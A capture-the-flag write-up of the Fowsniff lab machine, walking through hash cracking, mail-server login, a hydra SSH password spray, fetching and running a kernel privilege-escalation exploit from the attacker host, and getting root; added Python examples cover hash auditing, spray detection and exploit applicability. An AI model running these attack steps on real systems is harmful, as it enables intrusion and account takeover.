FOWSNIFF
Target IP: 10.0.2.16
by sc00by
##########
NMAP Scan:
##########
root@kali:~# nmap -sS 10.0.2.16
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 14:08 EST
Nmap scan report for 10.0.2.16
Host is up (0.00031s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
143/tcp open imap
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
[~!~] Ok so there's a web server and two different mail servers,
which I imagine will be a plane of attack.
########################
Checking the web server:
########################
[~!~] Apparently their company Twitter account, @fowsniffcorp, was pwned
by some hackers.
######################
Twitter investigation:
######################
[~!~] Oh boy, they left a dump of presumably some accounts/passwords...
Dump URL:
https://pastebin.com/NrAqVeeX
[~!~] Compromised creds:
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
[~!~] According to the hackers:
"They left their pop3 server WIDE OPEN, too!
MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P"
#######################
Cracking the passwords:
#######################
mauer : 8a28a94a588a95b80163709ab4313aa4 MD5 : mailcall
mustikka : ae1644dac5b77c0cf51e0d26ad6d7e56 MD5 : bilbo101
tegel : 1dc352435fecca338acfd4be10984009 MD5 : apples01
baksteen : 19f5af754c31f1e2651edde9250d69bb MD5 : skyler22
seina : 90dc16d47114aa13671c697fd506cf26 MD5 : scoobydoo2
stone : a92b8a29ef1183192e3d35187e0cfabd [Not found]
mursten : 0e9588cb62f4b6f27e33d449e2ba0b3b MD5 : carp4ever
parede : 4d6e42f56e127803285a0a7649b5ab11 MD5 : orlando12
sciana : f7fd98d380735e859f8b2ffbbede5a7e MD5 : 07011972
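The hackers' remark above holds because the dump is bare, unsalted MD5: one digest per candidate word is compared against every account at once, and two users with the same password would share a digest. The following is an added example (not part of the writeup, and not the CTF author's code) that parses the dump in the `user@host:md5hex` form quoted above, audits it against a candidate list the way a defender would check their own store against a common-password list, and shows the hardened alternative next to it: a per-user random salt plus an iterated KDF. The PBKDF2 round count and the `pbkdf2_sha256$rounds$salt$hash` storage layout are assumptions of this example, not anything the box uses.

```python
import hashlib
import hmac
import os

# The pastebin dump as quoted in the writeup, one "user@host:md5hex" entry per line.
LEAKED_DUMP = """\
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
"""


def parse_dump(text: str) -> dict:
    """Map each username to its hex digest; blank or malformed lines are skipped."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        account, digest = line.rsplit(":", 1)
        creds[account.split("@", 1)[0]] = digest.lower()
    return creds


def audit_unsalted_md5(creds: dict, candidates) -> dict:
    """Return {user: candidate} for every account whose bare-MD5 digest matches a candidate.

    Because there is no salt, each candidate is hashed exactly once and looked up
    against all accounts together, so the work does not grow with the user count.
    """
    by_digest = {}
    for user, digest in creds.items():
        by_digest.setdefault(digest, []).append(user)
    found = {}
    for word in candidates:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in by_digest.get(digest, []):
            found[user] = word
    return found


# Hardened storage (assumed layout for this example): random per-user salt and
# PBKDF2-HMAC-SHA256 from the standard library. A memory-hard KDF (scrypt, Argon2)
# is preferable where available; the principle shown here is the same.
PBKDF2_ROUNDS = 600_000


def hash_password(password: str, rounds: int = PBKDF2_ROUNDS) -> str:
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, password: str) -> bool:
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    # Constant-time comparison so verification timing leaks nothing about the digest.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    creds = parse_dump(LEAKED_DUMP)
    # Candidate list taken from the passwords the writeup reports as recovered.
    weak = audit_unsalted_md5(creds, ["mailcall", "bilbo101", "apples01", "skyler22",
                                      "scoobydoo2", "carp4ever", "orlando12", "07011972"])
    print(f"{len(weak)} of {len(creds)} bare-MD5 accounts fall to the candidate list: {sorted(weak)}")
    # Same password, two users: salted storage yields two unrelated records.
    a, b = hash_password("scoobydoo2", rounds=2000), hash_password("scoobydoo2", rounds=2000)
    print("salted records differ:", a != b, "| verify:", verify_password(a, "scoobydoo2"))
```

The audit function is the defender's side of the same fact: if any account in your own store falls to a short list of common passwords, the storage scheme, not just the users, needs fixing.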
##############################
Checking the pop3 mail server:
##############################
root@kali:~/Documents/Fowsniff# telnet 10.0.2.16 pop3
Trying 10.0.2.16...
Connected to 10.0.2.16.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
...tried other users, none worked...
user seina
+OK
pass scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280
.
retr 1
+OK 1622 octets
Return-Path:
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
Thanks,
A.J Stone
[~!~] This email has some juicy information, including
a temporary SSH password: S1ck3nBluff+secureshell
[~!~] The other email explained that seina was out sick
from work on the day the security team came in and
made everyone change their password, which is why
none of the other credentials worked.
#########################
Attempt to get into SSH:
#########################
root@kali:~/Documents/Fowsniff# hydra -t 4 -L users.txt -p S1ck3nBluff+secureshell 10.0.2.16 ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-02-18 14:51:33
[DATA] max 4 tasks per 1 server, overall 4 tasks, 9 login tries (l:9/p:1), ~3 tries per task
[DATA] attacking ssh://10.0.2.16:22/
[22][ssh] host: 10.0.2.16 login: baksteen password: S1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-02-18 14:51:37
[~!~] Looks like user 'baksteen' is the only one
that still has that temporary password
in play.
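The hydra run above is a textbook password spray: one password tried once against every account from a single source, with a success buried among the failures. As an added example (not from the writeup), here is the detection logic a defender would run over sshd's auth log to surface that pattern: group failures by source address, count distinct usernames inside a sliding window, and report any accepted login from the same source in that window. The log lines are constructed to mirror the hydra output (timestamps and the 192.168.7.36 address come from the page; PIDs, ports and the year are made up), and the five-user threshold and five-minute window are tuning assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines modelled on the hydra run: one password against nine
# accounts from 10.0.2.4, one success, followed by an ordinary login from elsewhere.
SAMPLE_AUTH_LOG = """\
Feb 18 14:51:33 fowsniff sshd[2101]: Failed password for mauer from 10.0.2.4 port 41002 ssh2
Feb 18 14:51:33 fowsniff sshd[2103]: Failed password for mustikka from 10.0.2.4 port 41004 ssh2
Feb 18 14:51:34 fowsniff sshd[2105]: Failed password for tegel from 10.0.2.4 port 41006 ssh2
Feb 18 14:51:34 fowsniff sshd[2107]: Accepted password for baksteen from 10.0.2.4 port 41008 ssh2
Feb 18 14:51:35 fowsniff sshd[2109]: Failed password for seina from 10.0.2.4 port 41010 ssh2
Feb 18 14:51:35 fowsniff sshd[2111]: Failed password for stone from 10.0.2.4 port 41012 ssh2
Feb 18 14:51:36 fowsniff sshd[2113]: Failed password for mursten from 10.0.2.4 port 41014 ssh2
Feb 18 14:51:36 fowsniff sshd[2115]: Failed password for parede from 10.0.2.4 port 41016 ssh2
Feb 18 14:51:37 fowsniff sshd[2117]: Failed password for sciana from 10.0.2.4 port 41018 ssh2
Feb 18 16:02:10 fowsniff sshd[2300]: Failed password for baksteen from 192.168.7.36 port 50122 ssh2
Feb 18 16:02:15 fowsniff sshd[2302]: Accepted password for baksteen from 192.168.7.36 port 50124 ssh2
"""

# Matches both "Failed password for USER" and "Failed password for invalid user USER".
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line: str, year: int = 2019):
    """Return a dict for an sshd password event, or None for any other line.

    Syslog timestamps carry no year, so the caller supplies one (assumed here).
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_password_spray(log_text: str, window: timedelta = timedelta(minutes=5),
                          min_users: int = 5, year: int = 2019) -> list:
    """Flag sources that fail against at least `min_users` distinct accounts within `window`.

    A spray looks different from a brute force: many users, about one failure each
    (reported as max_failures_per_user), so both numbers are returned.
    """
    events = [e for e in (parse_line(l, year) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for start in evs:                      # slide the window over each event
            end = start["ts"] + window
            in_window = [e for e in evs if start["ts"] <= e["ts"] <= end]
            per_user = defaultdict(int)
            for e in in_window:
                if e["result"] == "Failed":
                    per_user[e["user"]] += 1
            if len(per_user) >= min_users:
                findings.append({
                    "ip": ip,
                    "window_start": start["ts"].isoformat(),
                    "distinct_users_failed": len(per_user),
                    "max_failures_per_user": max(per_user.values()),
                    "accepted_users": sorted({e["user"] for e in in_window
                                              if e["result"] == "Accepted"}),
                })
                break                          # one finding per source is enough
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_AUTH_LOG):
        print(f"spray from {f['ip']} at {f['window_start']}: "
              f"{f['distinct_users_failed']} users, max {f['max_failures_per_user']} tries each, "
              f"accepted: {f['accepted_users'] or 'none'}")
```

An accepted login inside a flagged window (here baksteen from 10.0.2.4) is the line to act on first: it means the sprayed password was still valid somewhere, which is exactly the shared temporary password the email handed out.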
root@kali:~/Documents/Fowsniff# ssh baksteen@10.0.2.16
baksteen@10.0.2.16's password:
[ASCII-art login banner: "Fowsniff Corp." / "Delivering Solutions"]
**** Welcome to the Fowsniff Corporate Server! ****
---------- NOTICE: ----------
* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
New release '18.04.2 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36
baksteen@fowsniff:~$
[~!~] And there's our shell! Time to start digging.
#####################
Scanning the Machine:
#####################
[~!~] I decided to host a SimpleHTTPServer with python
in order to enumerate the machine and identify
potential vulnerabilities.
My machine (10.0.2.4):
~~~~~~~~~~~~~~~~~~~~~~
root@kali:~/exploit_tools# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Target machine:
~~~~~~~~~~~~~~~
baksteen@fowsniff:~$ wget http://10.0.2.4:8080/linux-exploit-suggester/linux-exploit-suggester.sh
--2019-02-21 18:02:15-- http://10.0.2.4:8080/linux-exploit-suggester/linux-exploit-suggester.sh
Connecting to 10.0.2.4:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65668 (64K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'
linux-exploit-sugge 100%[==================>] 64.13K --.-KB/s in 0.03s
2019-02-21 18:02:15 (2.13 MB/s) - 'linux-exploit-suggester.sh' saved [65668/65668]
baksteen@fowsniff:~$ chmod a+x linux-exploit-suggester.sh
baksteen@fowsniff:~$ ./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version:
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
70 kernel space exploits
32 user space exploits
...
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
...
[~!~] I attempted to use the 'chocobo_root' exploit,
but the exploit depended upon a certain offset
which the author did not have for the specific
kernel version. I should have run `uname -a`
before going through all the trouble to set it
up, then I would have known my kernel version
more specifically:
4.4.0-116-generic #140
NOTE: Fowsniff does not have a gcc or g++ compiler :[
But we can just compile on our Kali machine and host
a SimpleHTTPServer like before and transfer the executable
over to the victim machine.
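The lesson above (check `uname -r` against the tag before touching anything) can be made mechanical. The tag LES printed, `ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|...|51)-generic}`, is a small pattern language, and a patch-management check only needs to ask whether a host's distribution, version and kernel release all fall inside it. The following is an added example (not from the writeup and not part of linux-exploit-suggester) that parses a tag of that shape and answers that question; it assumes tags take the `distro[=versions][{kernel:pattern}]` form shown on the page and treats everything except the `(a|b)` alternation literally, so the dots in `4.4.0` cannot match arbitrary characters.

```python
import re

# The tag LES printed for CVE-2016-8655 on this box, copied from the writeup.
LES_TAG = "ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}"


def _alternation_to_regex(pattern: str) -> str:
    """Turn '4.4.0-(21|22)-generic' into a regex where only (a|b) groups are special."""
    escaped = re.escape(pattern)
    return escaped.replace(r"\(", "(").replace(r"\)", ")").replace(r"\|", "|")


def parse_tag(tag: str) -> dict:
    """Split 'distro=(versions){kernel:pattern}' into its parts; absent parts are None.

    Assumption: the tag follows the shape on the page. Tags with no version list
    ('ubuntu{kernel:...}') or no kernel clause ('ubuntu=16.04') are also accepted.
    """
    m = re.fullmatch(r"(\w+)(?:=(\S+?))?(?:\{kernel:([^}]*)\})?", tag)
    if not m:
        raise ValueError(f"unrecognised tag: {tag!r}")
    distro, versions, kernel = m.groups()
    return {"distro": distro, "versions": versions, "kernel": kernel}


def tag_applies(tag: str, distro: str, version: str, kernel_release: str) -> bool:
    """True only if every constraint present in the tag matches the host.

    `kernel_release` is the value `uname -r` prints, e.g. '4.4.0-116-generic'.
    """
    t = parse_tag(tag)
    if t["distro"].lower() != distro.lower():
        return False
    if t["versions"] and not re.fullmatch(_alternation_to_regex(t["versions"]), version):
        return False
    if t["kernel"] and not re.fullmatch(_alternation_to_regex(t["kernel"]), kernel_release):
        return False
    return True


if __name__ == "__main__":
    # The box's actual release from the writeup, and one build that the tag does list.
    for release in ("4.4.0-116-generic", "4.4.0-51-generic"):
        verdict = "in" if tag_applies(LES_TAG, "ubuntu", "16.04", release) else "NOT in"
        print(f"{release} is {verdict} the affected list for CVE-2016-8655")
```

Run against the box's real release the check says no, which is the answer the writeup reached only after building and transferring the exploit. Note that LES leaves "Distribution version" empty in its output above, so a tag match on kernel alone is the best the tool could offer here; feeding the version explicitly, as this check does, closes that gap.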
#########
Research:
#########
[~!~] None of the other exploits suggested by les
looked very well tuned to our machine, so I
did a quick search for our specific kernel
version and uncovered an exploit that looked
much more tuned to our needs:
https://www.exploit-db.com/exploits/44298
############
The exploit:
############
My Kali machine (local):
root@kali:~/exploit_tools/tmp# wget https://www.exploit-db.com/raw/44298
--2019-02-21 21:23:14-- https://www.exploit-db.com/raw/44298
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6021 (5.9K) [text/plain]
Saving to: '44298'
44298 100%[=========================>] 5.88K --.-KB/s in 0s
2019-02-21 21:23:15 (143 MB/s) - '44298' saved [6021/6021]
root@kali:~/exploit_tools/tmp# mv 44298 44298.c
root@kali:~/exploit_tools/tmp# gcc 44298.c
root@kali:~/exploit_tools/tmp# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Target machine:
baksteen@fowsniff:~$ wget http://10.0.2.4:8080/a.out
--2019-02-21 21:25:17-- http://10.0.2.4:8080/a.out
Connecting to 10.0.2.4:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: 'a.out'
a.out 100%[==================>] 17.46K --.-KB/s in 0s
2019-02-21 21:25:17 (234 MB/s) - 'a.out' saved [17880/17880]
baksteen@fowsniff:~$ chmod a+x a.out
baksteen@fowsniff:~$ ./a.out
task_struct = ffff880016790000
uidptr = ffff880018acc604
spawning root shell
root@fowsniff:~# whoami
root
root@fowsniff:~# sc00by owns Fowsniff!
[~!~] And there it is! A root shell!
Now let's capture the flag :)
root@fowsniff:~# cd /root
root@fowsniff:/root# ls
flag.txt Maildir
root@fowsniff:/root# cat flag.txt
Congratulations!
|--------------
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|--------------
|
|
|
|
|
|
---
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.
root@fowsniff:/root#
[~!~] All in all a very fun, stress-free machine.
I learned a lot about using python's
SimpleHTTPServer for easy, quick transportation
of files between machines.
Have a nice day!
-sc00by